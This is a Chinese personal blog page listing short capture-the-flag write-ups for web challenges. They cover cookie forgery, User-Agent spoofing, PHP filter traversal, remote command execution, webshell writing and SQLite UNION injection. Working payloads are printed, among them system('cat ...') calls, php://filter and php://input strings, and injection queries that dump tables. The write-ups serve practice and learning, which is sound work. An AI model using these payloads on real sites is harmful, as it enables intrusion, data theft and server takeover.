LOADING

加载过慢请开启缓存 浏览器默认开启

youbing的博客

记录学习与生活

技术博客,分享编程学习笔记

polar签到题

2026/4/23

打开题目发现提示得是“出题人的弟弟”

polar签到题_4e8d02c0

在请求包中发现cookie有一个didi属性值是no,这里把值改成yes发送

polar签到题_c9711dfe

结果base64解码得到./data/index.php,访问得到一段源码

polar签到题_2e2effcd

这里用php伪协议+双写绕过,得到一段base64编码后的字符串

payload:?file=php://filter/convert.base64-encode/resource=…/./…/./…/./…/./flag

polar签到题_a542e98f

解码后得到flag

阅读全文

Cookie伪造

2026/4/22

这里guest的密码也是guest

Cookie伪造_198693cf

抓包修改cookie中的role参数改为admin

Cookie伪造_233a83ca

成功登入admin账户,得到flag

Cookie伪造_ccebf760

阅读全文

HTTPS中间人攻击

2026/4/22

题目给了一个密钥和流量包,应该是要用密钥去解密捕获的流量,设置好密钥

HTTPS中间人攻击_3cc6a443

发现多出两个http协议

HTTPS中间人攻击_8d2dde40

追踪流得到flag

HTTPS中间人攻击_b237b913

HTTPS中间人攻击_80d786d3

阅读全文

Base64多层嵌套解码

2026/4/21

在源码中可以发现一段对源码的验证语句,可以通过解密得到密码

Base64多层嵌套解码_ecb9b438

解码过程:

第1步逆向:

Base64解码 SXpVRlF4TTFVelJtdFNSazB3VTJ4U1UwNXFSWGRVVlZrOWNWYzU=

第2步逆向:

这一步是 btoa(‘aB3’ + encoded + ‘qW9’).substr(2) 对第1步结果Base64解码 得到完整字符串,前面补回2个字符 去掉开头的”aB3”和结尾的”qW9”

第3步逆向:

这一步是 btoa(encoded.split(‘’).reverse().join(‘’)) 对第2步结果Base64解码 将字符串反转

第4步逆向:

这一步是 btoa(encoded + ‘xH7jK’).slice(3) 对第3步结果Base64解码 开头补回3个字符 去掉结尾的”xH7jK”

第5步逆向:

最后Base64解码,得到T17316

输入密码发现需要ctf-show-brower才能登录

Base64多层嵌套解码_aad8cf36

抓包修改User-Agent

Base64多层嵌套解码_f4fbb824

阅读全文

HTTP头注入

2026/4/21

f12查看源码发现密码被base64加密

HTTP头注入1

解码得到密码

HTTP头注入2

登录提示只能ctf-show-brower登录

HTTP头注入3

这里抓包修改(靶场默认开启https,删除s切换回http再抓包)

HTTP头注入4

发送请求包得到flag

HTTP头注入5

阅读全文

Base64编码隐藏

2026/4/21

打开题目f12查看源码发现密码被base64加密

Base64编码隐藏_fcd75f5b

解码得到密码

Base64编码隐藏_e01ece3e

登录得到flag

Base64编码隐藏_bbe86955

阅读全文

PolarShop

2026/4/9

打开题目发现有很多商品要积分换

PolarShop_63edd2f5

修改源码尝试从前端修改积分

PolarShop_77250e6c

将所有能换的换完得到一个文件暂时不知道作用,店主的秘密无法兑换查看前端代码也没找到办法

PolarShop_087c5df0

尝试扫目录,发现admin.php

PolarShop_35c013ba

查看admin.php出现管理员界面

PolarShop_963475b5

猜测刚刚的txt文件可能是密码字典抓包爆破一下

PolarShop_5c14898a

成功得到密码登录到后台

PolarShop_516a085f

查看店主的密码发现不让查看,发现cookie中有个user属性修改为Squirtle 看看能不能查看密码

PolarShop_e3893288

修改后请求得到flag

PolarShop_2d24b743

阅读全文

polarctf网站被黑

2026/4/8

打开题目网页中没有找到有用信息,查看响应发现有应该hint参数

polarctf网站被黑_8a81259a

Base32解码得到/n0_0ne_f1nd_m3/

polarctf网站被黑_70271246

查看得到一段源码

polarctf网站被黑_b18e5423

构造payload:

GET: ?text=php://input&file=php://filter/read=string.rot13/resource=imposible.php

POST: welcome to the 504sys

得到一段加密过的flag

``

用rot13解码得到flag

``

阅读全文

easyrce

2026/4/7

方法1:

?url=echo%20ls /;

easyrce_40a3cf6b

在根目录发现flag直接cat

?url=echo cat /f*;

easyrce_433e39c3

方法2:用system();执行命令步骤同上

?url=system(‘ls /‘);

?url=system(‘cat /flllllaaaaaaggggggg’);

方法3:写木马

?url=file_put_contents(‘1.php’,’‘);构造木马文件,蚁剑连接

easyrce_6a5c1bc4

在根目录找到flag

easyrce_283479cc

阅读全文

sql_search

2026/4/7

题目给了个搜索框

``

输入' or '1'='1发现输出了所有可搜索内容,证明存在sql注入

``

用' union select 1,2,3--确定列数

``

测试发现用SQLite数据库的命令发现可以被执行,用’ union select 1,group_concat(tbl_name),3 from sqlite_master where type=’table’–获取表名发现flaggggggggggg

sql_search_cd7212bb

用’ union select 1,sql,3 from sqlite_master where tbl_name=’flaggggggggggg’–查询得到flag列

sql_search_bb9855ca

用’ union select 1,flag,3 from flaggggggggggg–得到flag

sql_search_75dc43ba

阅读全文
1 ... 3 4 5 ... 16
avatar
youbing

你好!我是 youbing
这是我的技术博客
分享编程学习笔记和生活记录